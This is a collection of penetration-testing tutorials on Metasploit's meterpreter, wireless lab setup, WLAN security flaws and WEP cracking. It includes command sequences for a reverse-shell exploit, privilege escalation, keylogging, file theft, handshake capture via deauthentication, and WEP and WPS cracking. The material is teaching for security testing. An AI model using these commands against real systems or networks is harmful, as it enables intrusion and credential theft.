
How-To Tutorials - Penetration Testing

54 Articles

So, what is Metasploit?

Packt
06 Aug 2013
9 min read
(For more resources related to this topic, see here.)

In the IT industry, we have various flavors of operating systems, ranging from Mac, Windows, and *nix platforms to other server operating systems, which run any number of services depending on the needs of the organization. When given a task to assess the risk factor of any organization, it becomes very tedious to run single code snippets against these systems. What if, due to some hardware failure, all these code snippets are lost? Enter Metasploit.

Metasploit is an exploit development framework started by H. D. Moore in 2003, which was later acquired by Rapid7. It is basically a tool for the development of exploits and the testing of these exploits on live targets. The framework has been written entirely in Ruby and is currently one of the largest frameworks ever written in the Ruby language. The tool houses more than 800 exploits in its repository and hundreds of payloads for each exploit. It also contains various encoders, which help us obfuscate exploits to evade antivirus and other intrusion detection systems (IDS). As we progress in this book, we shall uncover more and more features of this tool. It can be used for penetration testing, risk assessment, vulnerability research, and other security development practices such as IDS and intrusion prevention system (IPS) development.

Top features you need to know about

After learning about the basics of the Metasploit framework, in this article we will find out the top features of Metasploit and learn some of the attack scenarios. This article will cover the following features:
- The meterpreter module
- Using auxiliary modules in Metasploit
- Client-side attacks with auxiliary modules

The meterpreter module

In the earlier article, we saw how to open up a meterpreter session in Metasploit. Here, we shall look at the features of the meterpreter module and its command set in detail. Before we see a working example, let's see why meterpreter is used in exploitation:
- It doesn't create a new process on the target system
- It runs in the context of the process that is being exploited
- It performs multiple tasks in one go; that is, you don't have to create separate requests for each individual task
- It supports script writing

Let's check out what the meterpreter shell looks like. Meterpreter allows you to provide commands and obtain results. The list of commands available under meterpreter can be obtained by typing help in the meterpreter command shell. The syntax for this command is as follows:

meterpreter > help

The following screenshots show the core commands, followed by the filesystem, networking, system, user interface, and other miscellaneous commands. As you can see in those screenshots, meterpreter has two command sets apart from its core set of commands:
- Stdapi
- Priv

The Stdapi command set contains the filesystem, networking, system, and user-interface commands. If an exploit can obtain higher privileges, the priv command set is loaded as well. By default, the stdapi and core command sets get loaded irrespective of the privilege level an exploit gets.
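To make this concrete, here is a hedged sketch of how a meterpreter session is typically obtained before running help; the exploit module, payload, and addresses are illustrative assumptions rather than values taken from this article:

    msfconsole
    msf > use exploit/windows/smb/ms08_067_netapi      # example exploit module against a lab target
    msf > set RHOST 192.168.1.10                        # hypothetical target address
    msf > set PAYLOAD windows/meterpreter/reverse_tcp   # deliver meterpreter as the payload
    msf > set LHOST 192.168.1.5                         # hypothetical attacker address
    msf > exploit                                       # on success, a meterpreter session opens
    meterpreter > help                                  # lists the core, stdapi, and (if loaded) priv commands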
Let's check out the route command from the meterpreter stdapi command set. The syntax is as follows:

meterpreter > route [-h] command [args]

In the following screenshot, we can see the list of all the routes on the target machine. In a scenario where we wish to add other subnets and gateways, we can use the concept of pivoting, where we add a couple of routes to optimize the attack. The following subcommands are supported by route:
- add [subnet] [netmask] [gateway]
- delete [subnet] [netmask] [gateway]
- list

Another command that helps during pivoting is port forwarding. Meterpreter supports port forwarding via the following command. The syntax is as follows:

meterpreter > portfwd [-h] [add/delete/list] [args]

As soon as an attacker breaks into any system, the first thing that he/she does is check what privilege level he/she has on the system. Meterpreter provides a command for working out the privilege level after breaking into the system. The syntax for this command is as follows:

meterpreter > getuid

The following screenshot demonstrates the working of getuid in meterpreter; in it, the attacker is accessing the system with the SYSTEM privilege. In a Windows environment, the SYSTEM privilege is the highest possible privilege available. Suppose we failed to get access to the system as a SYSTEM user, but succeeded in getting access as an administrator; meterpreter then provides you with many ways to elevate your access level. This is called privilege escalation. The commands are as follows:
- Syntax: meterpreter > getsystem
- Syntax: meterpreter > migrate process_id
- Syntax: meterpreter > steal_token process_id

The first method uses an internal procedure within meterpreter to gain SYSTEM access, whereas in the second method, we are migrating to a process that is running with the SYSTEM privilege. In this case, the exploit by default gets loaded in some process space of the Windows operating system. But there is always a possibility that the user clears that process space by deleting the process from the process manager. In a case like this, it's wise to migrate to a process that is usually untouched by the user. This helps in maintaining prolonged access to the victim machine. In the third method, we are actually impersonating a process that is running as a SYSTEM-privileged process. This is called impersonation via token stealing. Basically, Windows assigns users a unique ID called a Security Identifier (SID). Each thread holds a token containing information about its privilege level. Impersonating a token happens when one particular thread temporarily assumes the identity of another process on the same system.

We have seen the usage of process IDs in the preceding commands, but how do we fetch the process ID? That is exactly what we shall be covering here. Windows runs various processes, and the exploit itself will be running in the process space of the Windows system. To list all these processes with their PIDs and privilege levels, we use the following meterpreter command:

meterpreter > ps

The following screenshot gives a clear picture of the ps command. In it, we have the PIDs listed, and we can use these PIDs to escalate our privileges. Once you steal a token, it can be dropped using the drop_token command. The syntax for this command is as follows:

meterpreter > drop_token
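The following is a minimal sketch of how the privilege and process commands above tend to be chained together; the PID is hypothetical and the exact output depends on the target:

    meterpreter > getuid             # check the current privilege level
    meterpreter > getsystem          # attempt the built-in SYSTEM escalation techniques
    meterpreter > ps                 # list processes with their PIDs and owners
    meterpreter > migrate 1234       # move into a hypothetical long-lived SYSTEM process
    meterpreter > steal_token 1234   # alternatively, impersonate that process's token
    meterpreter > drop_token         # revert once the stolen token is no longer needed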
Another interesting command from the stdapi set is the shell command. This spawns a shell on the target system and enables us to navigate through the system effortlessly. The syntax for this command is as follows:

meterpreter > shell

The following screenshot shows the usage of the shell command; it shows that we are inside the target system. All the usual Windows command shell commands, such as dir, cd, and md, work here. After briefly covering the system commands, let's start learning the filesystem commands. A filesystem has a working directory. To find out the current working directory on the target system, we use the following command:

meterpreter > pwd

The following screenshot shows the command in action. Suppose you wish to search for different files on the target system; we can then use a command called search. The syntax for this command is as follows:

meterpreter > search [-d dir] [-r recurse] -f pattern

The various options available under the search command are:
- -d: The directory in which to begin the search. If nothing is specified, then it searches all drives.
- -f: The pattern that we would like to search for, for example, *.pdf.
- -h: Provides the help context.
- -r: Used when we need to recursively search the subdirectories. By default, this is set to true.

Once we get the file we need, we use the download command to download it to our drive. The syntax for this command is as follows:

meterpreter > download Full_relative_path

By now we have covered the core commands, system commands, networking commands, and filesystem commands. The last category of the stdapi command set is the user-interface commands. The most commonly used ones are the keylogging commands, which are very effective for sniffing user account credentials:
- Syntax: meterpreter > keyscan_start
- Syntax: meterpreter > keyscan_dump
- Syntax: meterpreter > keyscan_stop

This is the order in which these commands are used; the following screenshot shows them in action. The communication between meterpreter and its targets is done via the type-length-value (TLV) protocol. This means that the data is transferred in an encrypted manner, and it allows multiple channels of communication. The advantage of this is that multiple programs can communicate with the attacker. The creation of channels is illustrated in the following screenshot. The syntax for this command is as follows:

meterpreter > execute process_name -c

Here, -c is the parameter that tells meterpreter to channel the input/output. When an attack requires us to interact with multiple processes, the concept of channels comes in handy as a tool for the attacker. The close command is used to exit a channel.

Summary

In this article, we learned what Metasploit is and also saw some of its top features.

Resources for Article: Further resources on this subject: Understanding the True Security Posture of the Network Environment being Tested [Article] Preventing Remote File Includes Attack on your Joomla Websites [Article] Tips and Tricks on BackTrack 4 [Article]


Wireless and Mobile Hacks

Packt
22 Jul 2014
6 min read
(For more resources related to this topic, see here.)

So I don't think it's possible to go to a conference these days and not see a talk on mobile or wireless. (They tend to schedule the streams to have both mobile and wireless talks at the same time—the sneaky devils. There is no escaping the wireless knowledge!) So, it makes sense that we work out some ways of training people how to skill up on these technologies. We're going to touch on some older vulnerabilities that you don't see very often, but as always, when you do, it's good to know how to insta-win.

Wireless environment setup

This article is a bit of an odd one, because with Wi-Fi and mobile, it's much harder to create a safe environment for your testers to work in. For infrastructure and web app tests, you can simply say, "it's on the network, yo" and they'll get the picture. However, Wi-Fi and mobile devices are almost everywhere in places that require pen testing. It's far too easy for someone to get confused and attempt to pwn a random bystander. While this sounds hilarious, it is a serious issue if that occurs. So, adhere to the following guidelines for safer testing:
- Where possible, try and test away from other people and networks. If there is an underground location nearby, testing becomes simpler, as floors are more effective than walls for blocking Wi-Fi signals (contrary to the firmly held beliefs of anyone who's tried to improve their home network signal). If you're an individual who works for a company, or, you know, has the money to make a Faraday cage, then by all means do the setup in there. I'll just sit here and be jealous.
- Unless it's pertinent to the test scenario, provide testers with enough knowledge to identify the devices and networks they should be attacking. A good way to go is to provide the MAC address, as they very rarely collide. (MAC-randomizing tools be damned.)
- If an evil network has to be created, name it something obvious and reduce the access to ensure that it is visible to as few people as possible. The naming convention we use is Connectingtomewillresultin followed by pain, death, and suffering. While this steers away the majority of people, it does appear to attract the occasional fool, but that's natural selection for you.
- Once again, because it is worth repeating, don't use your home network. Especially in this case, using your home equipment could expose you to random passersby or evil neighbors. I'm pretty sure my neighbor doesn't know how to hack, but if he does, I'm in for a world of hurt.

Software

We'll be using Kali Linux as the base for this article, as we'll be using the tools provided by Kali to set up our networks for attack. Everything you need is built into Kali, but if you happen to be using another build such as Ubuntu or Debian, you will need the following tools (a combined install command for the packaged ones follows the list):
- Iwtools (apt-get install iw): This is the wireless equivalent of ifconfig that allows the alteration of wireless adapters, and provides a handy method to monitor them.
- Aircrack suite (apt-get install aircrack-ng): The basic tools of wireless attacking are available in the Aircrack suite. This selection of tools provides a wide range of services, including cracking encryption keys, monitoring probe requests, and hosting rogue networks.
- Hostapd (apt-get install hostapd): Airbase-ng doesn't support WPA2 networks, so we need to bring in the serious programs for serious people. This can also be used to host WEP networks, but getting Aircrack suite practice is not to be sniffed at.
- Wireshark (apt-get install wireshark): Wireshark is one of the most widely used network analysis tools. It's not only used by pen testers, but also by people who have CISSP and other important letters after their names. This means that it's a tool that you should know about.
- dnschef (https://thesprawl.org/projects/dnschef/): Thanks to Duncan Winfrey, who pointed me in this direction. DNSChef is a fantastic resource for doing DNS spoofing. Other alternatives include dnsspoof and Metasploit's Fake DNS.
- Crunch (apt-get install crunch): Crunch generates strings in a specified order. While it seems very simple, it's incredibly useful. Use it with care though; it has filled more than one unwitting user's hard drive.
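On a Debian-based build such as Ubuntu, the packaged tools in this list can be pulled in with a single command; this is only a sketch using the package names quoted above (dnschef is fetched separately from its project page):

    sudo apt-get update
    sudo apt-get install iw aircrack-ng hostapd wireshark crunch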
Hardware

You want to host a dodgy network. The first question to ask yourself, after the question you already asked yourself about software, is: is your laptop/PC capable of hosting a network? If your adapter is compatible with injection drivers, you should be fine. A quick check is to boot up Kali Linux and run sudo airmon-ng start <interface>. This will put your adapter into monitor mode. If you don't have the correct drivers, it'll throw an error. Refer to a potted list of compatible adapters at http://www.aircrack-ng.org/doku.php?id=compatibility_drivers.

However, if you don't have access to an adapter with the required drivers, fear not. It is still possible to set up some of the scenarios. There are two options. The first and most obvious is "buy an adapter." I can understand that you might not have a lot of cash kicking around, so my advice is to pick up an Edimax ew-7711-UAN—it's really cheap and pretty compact. It has a short range and is fairly low powered. It is also compatible with Raspberry Pi and BeagleBone, which is awesome but irrelevant.

The second option is a limited solution. Most phones on the market can be used as wireless hotspots and so can be used to set up profiles for other devices for the phone-related scenarios in this article. Unfortunately, unless you have a rare and epic phone, it's unlikely to support WEP, so that's out of the question. There are solutions for rooted phones, but I wouldn't instruct you to root your phone, and I'm most certainly not providing a guide to do so. Realistically, in order to create spoofed networks effectively and set up these scenarios, a computer is required. Maybe I'm just not being imaginative enough.
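As a quick illustration of hosting a WPA2 test network with hostapd, here is a hedged, minimal configuration; the interface name, SSID, passphrase, and file path are lab assumptions, not values from this article:

    # /etc/hostapd/test-lab.conf (hypothetical path)
    interface=wlan0
    driver=nl80211
    ssid=Connectingtomewillresultinpain
    hw_mode=g
    channel=6
    wpa=2
    wpa_key_mgmt=WPA-PSK
    wpa_passphrase=SuperSecretLabKey123
    rsn_pairwise=CCMP

Start it with sudo hostapd /etc/hostapd/test-lab.conf and point a throwaway client at the new SSID to build out the scenario.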


Common WLAN Protection Mechanisms and their Flaws

Packt
07 Mar 2016
19 min read
In this article by Vyacheslav Fadyushin, the author of the book Building a Pentesting Lab for Wireless Networks, we will discuss various WLAN protection mechanisms and the flaws present in them. To be able to protect a wireless network, it is crucial to clearly understand which protection mechanisms exist and which security flaws they have. This topic will be useful not only for those readers who are new to Wi-Fi security, but also as a refresher for experienced security specialists.

(For more resources related to this topic, see here.)

Hiding SSID

Let's start with one of the common mistakes made by network administrators: relying only on security by obscurity. In the context of the current subject, it means using a hidden WLAN SSID (short for service set identifier), or simply a hidden WLAN name. A hidden SSID means that a WLAN does not send its SSID in the broadcast beacons advertising itself and doesn't respond to broadcast probe requests, thus making itself unavailable in the list of networks on Wi-Fi-enabled devices. It also means that normal users do not see that WLAN in their available networks list. But the lack of WLAN advertising does not mean that the SSID is never transmitted in the air—it is actually transmitted in plaintext in a lot of packets between access points and the devices connected to them, regardless of the security type used. Therefore, SSIDs are always available to all the Wi-Fi network interfaces in range and visible to any attacker using various passive sniffing tools.

MAC filtering

To be honest, MAC filtering cannot even be considered a security or protection mechanism for a wireless network, but it is still called one in various sources. So let's clarify why we cannot call it a security feature. Basically, MAC filtering means allowing only those devices that have MAC addresses from a pre-defined list to connect to a WLAN, and not allowing connections from other devices. MAC addresses are transmitted unencrypted in Wi-Fi and are extremely easy for an attacker to intercept without even being noticed (refer to the following screenshot, which shows a wireless traffic sniffing tool easily revealing MAC addresses). Keeping in mind the extreme simplicity of changing the physical address (MAC address) of a network interface, it becomes obvious why MAC filtering should not be treated as a reliable security mechanism. MAC filtering can be used to support other security mechanisms, but it should not be used as the only security measure for a WLAN.

WEP

Wired Equivalent Privacy (WEP) was born almost 20 years ago, at the same time as the Wi-Fi technology itself, and was integrated as a security mechanism into the IEEE 802.11 standard. As often happens with new technologies, it soon became clear that WEP contains weaknesses by design and cannot provide reliable security for wireless networks. Several attack techniques were developed by security researchers that allowed them to crack a WEP key in a reasonable time and use it to connect to a WLAN or intercept network communications between the WLAN and client devices. Let's briefly review how WEP encryption works and why it is so easy to break.

WEP uses so-called initialization vectors (IVs) concatenated with a WLAN's shared key to encrypt transmitted packets. After encrypting a network packet, the IV is added to the packet as it is and sent to the receiving side, for example, an access point. This process is depicted in the following flowchart (the WEP encryption process). An attacker just needs to collect enough IVs, which is also a trivial task using additional replay attacks to force victims to generate more IVs. Even worse, there are attack techniques that allow an attacker to penetrate WEP-protected WLANs even without connected clients, which makes those WLANs vulnerable by default. Additionally, WEP does not have cryptographic integrity control, which makes it vulnerable not only to attacks on confidentiality. There are numerous ways in which an attacker can abuse a WEP-protected WLAN, for example (a short command sketch follows this list):
- Decrypting network traffic using passive sniffing and statistical cryptanalysis
- Decrypting network traffic using active attacks (a replay attack, for example)
- Traffic injection attacks
- Unauthorized WLAN access
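To show how little effort this takes in practice, here is a hedged sketch of a passive WEP key recovery using the aircrack-ng suite; the interface, channel, BSSID, and capture file names are assumptions:

    sudo airmon-ng start wlan0                                            # enable monitor mode on the adapter
    sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_dump wlan0mon  # passively collect IVs from the target WLAN
    sudo aircrack-ng wep_dump-01.cap                                      # statistical attack once enough IVs are captured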
Although WEP was officially superseded by the WPA technology in 2003, it can still sometimes be found in private home networks and even in some corporate networks (mostly belonging to small companies nowadays). But this security technology has become very rare and will not be used anymore in future, largely due to awareness in corporate networks and because manufacturers no longer activate WEP by default on new devices. In our humble opinion, device manufacturers should not include WEP support in their new devices at all, to prevent its usage and increase their customers' security. From the security specialist's point of view, WEP should never be used to protect a WLAN, but it can be used for Wi-Fi security training purposes.

Regardless of the security type in use, shared keys always add an additional security risk: users often tend to share keys, thus increasing the risk of key compromise and reducing accountability for key privacy. Moreover, the more devices use the same key, the greater the amount of traffic that becomes suitable for an attacker during cryptanalytic attacks, increasing their performance and chances of success. This risk can be minimized by using personal identifiers (a key or certificate) for users and devices.

WPA/WPA2

Due to the numerous WEP security flaws, the next generation of Wi-Fi security mechanisms became available in 2003: Wi-Fi Protected Access (WPA). It was announced as an intermediate solution until WPA2 became available, and it contained significant security improvements over WEP. Those improvements include:
- Stronger encryption.
- Cryptographic integrity control: WPA uses an algorithm called Michael instead of the CRC used in WEP. This is supposed to prevent altering data packets on the fly and protects against resending sniffed packets.
- Usage of temporary keys: The Temporal Key Integrity Protocol (TKIP) automatically changes the encryption keys generated for every packet. This is the major improvement over static WEP, where encryption keys have to be entered manually in an AP's config. TKIP also uses RC4, but the way it is used was improved.
- Support for client authentication: The capability to use dedicated authentication servers for user and device authentication made WPA suitable for use in large enterprise networks.

Support for the cryptographically strong Advanced Encryption Standard (AES) algorithm was implemented in WPA, but it was not made mandatory, only optional. Although WPA was a significant improvement over WEP, it was a temporary solution before WPA2 was released in 2004 and became mandatory for all new Wi-Fi devices.
WPA2 works very similarly to WPA, and the main differences between WPA and WPA2 lie in the algorithms used to provide security:
- AES became the mandatory encryption algorithm in WPA2, replacing the default RC4 in WPA
- TKIP, used in WPA, was replaced by Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)

Because of their very similar workflows, WPA and WPA2 are also vulnerable to similar or identical attacks and are usually referred to together as WPA/WPA2. Both WPA and WPA2 can work in two modes: pre-shared key (PSK) or personal mode, and enterprise mode.

Pre-shared key mode

Pre-shared key or personal mode was intended for home and small office use, where networks have low complexity. We are more than sure that all our readers have met this mode and that most of you use it at home to connect your laptops, mobile phones, tablets, and so on to your home networks. The general idea of PSK mode is using the same secret key on the access point and on the client device to authenticate the device and establish an encrypted connection for networking. The process of WPA/WPA2 authentication using a PSK consists of four phases and is also called a 4-way handshake; it is depicted in the following diagram (the WPA/WPA2 4-way handshake).

The main WPA/WPA2 flaw in PSK mode is the possibility of sniffing a whole 4-way handshake and brute-forcing the security key offline, without any interaction with the target WLAN. Generally, the security of a WLAN mostly depends on the complexity of the chosen PSK. Computing a PMK (short for pairwise master key), as used in the 4-way handshake (refer to the handshake diagram), is a very time-consuming process compared to other computing operations, and computing hundreds of thousands of them can take a very long time. But when a short, low-complexity PSK is in use, a brute-force attack does not take long even on a not-so-powerful computer. If a key is complex and long enough, cracking it can take much longer, but there are still ways to speed up the process:
- Using powerful computers with CUDA (short for Compute Unified Device Architecture), which allows software to communicate directly with GPUs for computing. As GPUs are natively designed to perform mathematical operations and do so much faster than CPUs, the cracking process works several times faster with CUDA.
- Using rainbow tables that contain pairs of various PSKs and their corresponding precomputed hashes. They save a lot of time for an attacker, because the cracking software just searches for a value from an intercepted 4-way handshake in the rainbow tables and, if there is a match, returns the key corresponding to the given PMK, instead of computing PMKs for every possible character combination. Because WLAN SSIDs are used in the 4-way handshake analogously to a cryptographic salt, PMKs for the same key will differ for different SSIDs. This limits the application of rainbow tables to a number of the most popular SSIDs.
- Using cloud computing is another way to speed up the cracking process, but it usually costs additional money. The more computing power an attacker can rent (or obtain through other means), the faster the process goes. There are also online cloud-cracking services available on the Internet for various cracking purposes, including cracking 4-way handshakes.

Furthermore, as with WEP, the more users know a WPA/WPA2 PSK, the greater the risk of compromise—that's why it is also not an option for big, complex corporate networks.
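The offline attack just described is commonly run with the aircrack-ng suite; the following is a hedged sketch in which the BSSID, client MAC, channel, and wordlist path are assumptions:

    sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_dump wlan0mon             # wait for a client to perform a 4-way handshake
    sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon   # optionally force a reconnect to capture the handshake sooner
    sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF wpa_dump-01.cap   # offline dictionary attack against the PSK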
WPA/WPA2 PSK mode provides a sufficient level of security for home and small office networks only when the key is long and complex enough and is used with a unique (or at least not popular) WLAN SSID.

Enterprise mode

As already mentioned in the previous section, using shared keys in itself poses a security risk, and in the case of WPA/WPA2 the level of protection relies heavily on key length and complexity. But there are several factors in enterprise networks that should be taken into account when talking about WLAN infrastructure: flexibility, manageability, and accountability. There are various components that implement these functions in big networks, but in the context of our topic, we are mostly interested in two of them: AAA (short for authentication, authorization, and accounting) servers and wireless controllers.

WPA-Enterprise or 802.1x mode was designed for enterprise networks where a high security level is needed and the use of an AAA server is required. In most cases, a RADIUS server is used as the AAA server, and the following EAP (Extensible Authentication Protocol) types are supported with WPA/WPA2 (plus several more, depending on the wireless device) to perform authentication:
- EAP-TLS
- EAP-TTLS/MSCHAPv2
- PEAPv0/EAP-MSCHAPv2
- PEAPv1/EAP-GTC
- PEAP-TLS
- EAP-FAST

You can find a simplified WPA-Enterprise authentication workflow in the following diagram (WPA-Enterprise authentication). Depending on the EAP type configured, WPA-Enterprise can provide various authentication options. The most popular EAP type (based on our own experience in numerous pentests) is PEAPv0/MSCHAPv2, which integrates relatively easily with existing Microsoft Active Directory infrastructures and is relatively easy to manage. But this type of WPA protection is also relatively easy to defeat by stealing and brute-forcing user credentials with a rogue access point. The most secure EAP type (at least, when configured and managed correctly) is EAP-TLS, which employs certificate-based authentication for both users and authentication servers. During this type of authentication, clients also check the server's identity, and a successful attack with a rogue access point becomes possible only if there are errors in the configuration or insecurities in certificate maintenance and distribution. It is recommended to protect enterprise WLANs with WPA-Enterprise in EAP-TLS mode with mutual client and server certificate-based authentication, but this type of security requires additional work and resources.

WPS

Wi-Fi Protected Setup (WPS) is actually not a security mechanism but a key exchange mechanism, which plays an important role in establishing connections between devices and access points. It was developed to make the process of connecting a device to an access point easier, but it turned out to be one of the biggest holes in modern WLANs if activated. WPS works with WPA/WPA2-PSK and allows connecting devices to WLANs with one of the following methods:
- PIN: Entering a PIN on a device. The PIN is usually printed on a sticker on the back of the Wi-Fi access point.
- Push button: Special buttons have to be pushed on both the access point and the client device during the connection phase. Buttons on devices can be physical or virtual.
- NFC: A client should bring a device close to an access point to utilize the Near Field Communication technology.
- USB drive: The necessary connection information exchange between an access point and a device is done using a USB drive.

Because WPS PINs are very short and their first and second parts are validated separately, an online brute-force attack on a PIN can be completed in several hours, allowing an attacker to connect to the WLAN (a short command sketch follows). Furthermore, the possibility of offline PIN cracking was discovered in 2014, which allows attackers to crack PINs in 1 to 30 seconds, although it works only on certain devices. You should also not forget that a person who is not permitted to connect to a WLAN but who can physically access a Wi-Fi router or access point can also read and use the PIN, or connect via the push button method.
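A hedged sketch of the online PIN attack described above, using the wash and reaver tools shipped with Kali; the interface and BSSID are assumptions:

    sudo wash -i wlan0mon                               # list access points in range that advertise WPS
    sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv    # brute-force the WPS PIN online; the recovered PSK is printed on success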
Getting familiar with the Wi-Fi attack workflow

In our opinion (and we hope you agree with us), planning and building a secure WLAN is not possible without an understanding of the various attack methods and their workflow. In this topic, we will give you an overview of how attackers work when they are hacking WLANs.

General Wi-Fi attack methodology

After refreshing our knowledge of wireless threats and Wi-Fi security mechanisms, let's have a look at the attack methodology used by attackers in the real world. Of course, as with all other types of network attack, wireless attack workflows depend on the situation and the targets, but they still align with the following general sequence in almost all cases.

The first step is planning. Normally, attackers need to plan what they are going to attack, how they can do it, which tools are necessary for the task, when the best time and place to attack certain targets is, and which configuration templates will be useful, so that they can be prepared in advance. White-hat hackers or penetration testers need to set schedules and coordinate project plans with their customers, choose contact persons on the customer side, define project deliverables, and do other organizational work if demanded. As with every penetration testing project, the better a project is planned (and we can use the word "project" for black-hat hackers' tasks too), the greater the chances of a successful result.

The next step is the survey. Getting information about a target that is as accurate and as complete as possible is crucial for a successful hack, especially in uncommon network infrastructures. To hack a WLAN or its wireless clients, an attacker would normally collect at least the SSIDs or MAC addresses of access points and clients and information about the security type in use. It is also very helpful for an attacker to know whether WPS is enabled on a target access point. All that data allows attackers not only to set proper configs and choose the right options for their tools, but also to choose appropriate attack types and conditions for a certain WLAN or Wi-Fi client. All collected information, especially non-technical information (for example, company and department names, brands, or employee names), can also become useful at the cracking phase for building dictionaries for brute-force attacks. Depending on the type of security and the attacker's luck, the data collected at the survey phase can even make the active attack phase unnecessary and allow an attacker to proceed directly to the cracking phase.

The active attacks phase involves active interaction between an attacker and the targets (WLANs and Wi-Fi clients). At this phase, attackers have to create the conditions necessary for the chosen attack type and execute it. This includes sending various Wi-Fi management and control frames and installing rogue access points. If an attacker's goal is to cause a denial of service in a target WLAN, such attacks are also executed at this phase.
Some of the active attacks are essential to successfully hack a WLAN, but some of them are intended just to speed up hacking and can be omitted to avoid raising alarms on any wireless intrusion detection/prevention systems (wIDPS) that may be installed in the target network. Thus, the active attacks phase can be called optional.

Cracking is another important phase, where an attacker cracks 4-way handshakes, WEP data, NTLM hashes, and so on, which were intercepted at the previous phases. There are plenty of free and commercial tools and services available, including cloud cracking services. In case of success at this phase, an attacker obtains the target WLAN's secret(s) and can proceed with connecting to the WLAN, decrypting intercepted traffic, and so on.

The active attacking phase

Let's have a closer look at the most interesting parts of the active attack phase—WPA-PSK and WPA-Enterprise attacks—in the following topics.

WPA-PSK attacks

As both WPA and WPA2 are based on the 4-way handshake, attacking them doesn't differ: an attacker needs to sniff a 4-way handshake at the moment a connection is established between an access point and an arbitrary wireless client, and then brute-force the matching PSK. It does not matter whose handshake is intercepted, because all clients use the same PSK for a given target WLAN. Sometimes, attackers have to wait a long time until a device connects to a WLAN so that they can intercept a 4-way handshake, and of course they would like to speed up the process when possible. For that purpose, they force an already connected device to disconnect from the access point by sending control frames (a deauthentication attack) on behalf of the target access point. When a device receives such a frame, it disconnects from the WLAN and tries to reconnect if the automatic reconnect feature is enabled (it is enabled by default on most devices), thus performing another 4-way handshake that can be intercepted by the attacker. Another possibility for hacking a WPA-PSK protected network is to crack the WPS PIN, if WPS is enabled on the target WLAN.

Enterprise WLAN attacks

Attacking becomes a little more complicated if WPA-Enterprise security is in place, but it can be executed in several minutes by a properly prepared attacker by imitating a legitimate access point with a RADIUS server and gathering user credentials for further analysis (cracking). To stage this attack, an attacker needs to install a rogue access point with an SSID identical to the target WLAN's SSID and set other parameters (like the EAP type) similar to the target WLAN, to increase the chances of success and reduce the probability of the attack being quickly detected. Most user Wi-Fi devices choose an access point for a connection to a certain WLAN by signal strength—they connect to the one with the strongest signal. That is why an attacker needs to use a powerful Wi-Fi interface for the rogue access point, to override signals from the legitimate ones and make nearby devices connect to the rogue access point. A RADIUS server used during such attacks should have the capability to record authentication data, NTLM hashes, for example. From a user perspective, being attacked in this way just looks like being unable to connect to a WLAN for an unknown reason, and it might not even be noticed if the user is not using the device at that moment and is just passing by the rogue access point. It is worth mentioning that classic physical security or wireless IDPS solutions are not always effective in such cases.
An attacker or a penetration tester can install a rogue access point outside of the range of a target WLAN. This allows the hacker to attack user devices without the need to get into a physically controlled area (for example, an office building), thus making the rogue access point unreachable and invisible to wireless IDPS systems. Such a place could be a bus or train station, a parking lot, or a café where a lot of users of the target WLAN go with their Wi-Fi devices. Unlike WPA-PSK, with only one key shared between all WLAN users, Enterprise mode employs personified credentials for each user, and those credentials can be more or less complex depending only on the particular user. That is why it is better to collect as many user credentials and hashes as possible, thus increasing the chances of successful cracking.

Summary

In this article, we looked at the security mechanisms that are used to secure access to wireless networks, their typical threats, and the common misconfigurations that lead to security breaches and allow attackers to harm corporate and private wireless networks. The brief attack methodology overview has given us a general understanding of how attackers normally act during wireless attacks and how they bypass common security mechanisms by abusing certain flaws in those mechanisms. We also saw that the most secure and preferable way to protect a wireless network is to use WPA2-Enterprise security along with mutual client and server authentication, which we are going to implement in our penetration testing lab.

Resources for Article: Further resources on this subject: Pentesting Using Python [article] Advanced Wireless Sniffing [article] Wireless and Mobile Hacks [article]


An Introduction to WEP

Packt
10 Aug 2015
4 min read
This article by Marco Alamanni, the author of the book Kali Linux Wireless Penetration Testing Essentials, explains that the WEP protocol was introduced with the original 802.11 standard as a means to provide authentication and encryption to wireless LAN implementations. It is based on the RC4 (Rivest Cipher 4) stream cipher with a preshared secret key (PSK) of 40 or 104 bits, depending on the implementation. A 24-bit pseudo-random Initialization Vector (IV) is concatenated with the preshared key to generate the per-packet keystream used by RC4 for the actual encryption and decryption processes. Thus, the resulting per-packet key can be 64 or 128 bits long.

(For more resources related to this topic, see here.)

In the encryption phase, the keystream is XORed with the plaintext data to obtain the encrypted data, while in the decryption phase the encrypted data is XORed with the keystream to obtain the plaintext data. The encryption process is shown in the following diagram.

Attacks against WEP

First of all, we must say that WEP is an insecure protocol and has been deprecated by the Wi-Fi Alliance. It suffers from various vulnerabilities related to the generation of the keystreams, the use of IVs, and the length of the keys. The IV is used to add randomness to the keystream, trying to avoid the reuse of the same keystream to encrypt different packets. This purpose was not accomplished in the design of WEP, because the IV is only 24 bits long (with 2^24 = 16,777,216 possible values) and it is transmitted in cleartext within each frame. Thus, after a certain period of time (depending on the network traffic), the same IV, and consequently the same keystream, will be reused, allowing the attacker to collect the corresponding ciphertexts and perform statistical attacks to recover the plaintexts and the key.

The first well-known attack against WEP was the Fluhrer, Mantin, and Shamir (FMS) attack, back in 2001. The FMS attack relies on the way WEP generates the keystreams and on the fact that it also uses weak IVs to generate weak keystreams, making it possible for an attacker to collect a sufficient number of packets encrypted with these keystreams, analyze them, and recover the key. The number of IVs to be collected to complete the FMS attack is about 250,000 for 40-bit keys and 1,500,000 for 104-bit keys. The FMS attack has been enhanced by KoreK, improving its performance. Andreas Klein found more correlations between the RC4 keystream and the key than the ones discovered by Fluhrer, Mantin, and Shamir, which can be used to crack the WEP key. In 2007, Pyshkin, Tews, and Weinmann (PTW) extended Andreas Klein's research and improved the FMS attack, significantly reducing the number of IVs needed to successfully recover the WEP key. Indeed, the PTW attack does not rely on weak IVs like the FMS attack does, and it is very fast and effective. It is able to recover a 104-bit WEP key with a success probability of 50 percent using less than 40,000 frames, and with a probability of 95 percent with 85,000 frames. The PTW attack is the default method used by Aircrack-ng to crack WEP keys.

